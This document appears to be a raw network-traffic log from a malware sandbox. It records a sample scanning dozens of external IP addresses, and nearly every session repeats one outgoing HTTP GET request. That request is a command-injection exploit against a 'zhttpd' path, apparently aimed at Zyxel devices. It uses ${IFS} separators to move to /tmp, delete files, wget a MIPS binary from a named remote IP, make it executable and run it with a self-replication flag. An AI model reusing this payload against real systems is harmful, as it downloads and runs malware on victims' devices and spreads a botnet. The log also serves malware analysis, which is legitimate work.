                                                  Jan 19, 2024 18:24:14.428143024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9035192.168.2.1338560211.62.0.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428175926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9036192.168.2.1357160184.194.80.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428216934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9037192.168.2.1348812209.154.181.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428251982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9038192.168.2.133440639.147.208.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428282976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9039192.168.2.1348800175.183.217.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428348064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9040192.168.2.135596088.119.241.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428378105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9041192.168.2.1332842119.168.28.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428414106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9042192.168.2.1354714207.252.194.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428458929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9043192.168.2.134310278.204.255.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428488970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9044192.168.2.134144270.241.118.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428546906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9045192.168.2.135959071.7.12.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428575993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9046192.168.2.1353900201.41.177.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428627014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9047192.168.2.135761690.78.162.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428670883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9048192.168.2.1355660137.90.198.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428708076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9049192.168.2.1335912180.11.17.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428752899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9050192.168.2.134026420.36.79.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428809881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9051192.168.2.1356486183.152.35.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428838968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9052192.168.2.1336376150.184.128.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428884029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9053192.168.2.133388891.81.97.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428917885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9054192.168.2.134712418.235.88.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428919077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9055192.168.2.135849298.179.93.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428963900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9056192.168.2.1356636107.171.198.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429019928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9057192.168.2.1356924204.129.217.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429085016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9058192.168.2.1344812174.244.72.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429112911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9059192.168.2.133533444.193.15.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429156065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9060192.168.2.1350028201.151.204.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429213047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9061192.168.2.134890414.238.97.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429260969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9062192.168.2.133824019.219.173.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429287910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9063192.168.2.135961445.9.2.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429332972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9064192.168.2.135982463.61.22.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429369926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9065192.168.2.134530688.206.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429419994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9066192.168.2.1343954202.114.124.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429440022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9067192.168.2.1351822137.180.159.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429490089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9068192.168.2.1343678212.95.213.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429528952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9069192.168.2.134055849.155.134.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429573059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9070192.168.2.1346528173.70.81.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429634094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9071192.168.2.135315453.162.199.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429661989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9072192.168.2.1359302220.55.19.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429697990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9073192.168.2.134856499.213.102.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429755926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9074192.168.2.1342230121.197.201.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429780006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9075192.168.2.135230478.155.21.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429837942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9076192.168.2.1337402203.130.224.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429862022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9077192.168.2.1342848124.54.101.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429900885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9078192.168.2.1340584103.189.148.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429920912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9079192.168.2.1352280181.185.252.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.429970980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9080192.168.2.1344250155.244.106.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.430032969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9081192.168.2.1354634199.109.1.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.430083990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9082192.168.2.135279475.113.146.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.430088043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9083192.168.2.1338494128.136.28.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.430160999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9084192.168.2.134375689.18.174.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.430206060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9085192.168.2.135172449.150.205.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.430263042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9086192.168.2.134478475.65.179.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442437887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9087192.168.2.135422668.13.225.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442472935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9088192.168.2.1360648126.51.94.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442516088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9089192.168.2.1335086132.56.228.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442538977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9090192.168.2.1358404165.254.47.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442605972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9091192.168.2.1345070149.48.241.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442636013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9092192.168.2.133438624.62.85.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442687988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9093192.168.2.1339790165.224.168.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442727089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9094192.168.2.1343674123.206.191.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442783117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9095192.168.2.1349862144.209.226.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442827940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9096192.168.2.135625812.122.240.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442873001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9097192.168.2.13443489.247.246.169443
                                                  TimestampBytes transferredDirectionData
